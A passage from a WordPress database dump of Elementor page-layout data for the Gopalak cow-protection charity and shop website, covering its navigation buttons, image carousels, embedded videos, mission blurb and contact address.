here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#FFCC2A\",\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"gradient\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11573,1922,'_elementor_page_assets','a:0:{}'),(11575,1923,'_elementor_edit_mode','builder'),(11576,1923,'_elementor_template_type','wp-page'),(11577,1923,'_elementor_version','3.7.8'),(11578,1923,'_wp_page_template','elementor_canvas'),(11579,1923,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#FFCC2A\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"gradient\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#FFCC2A\",\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"gradient\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFF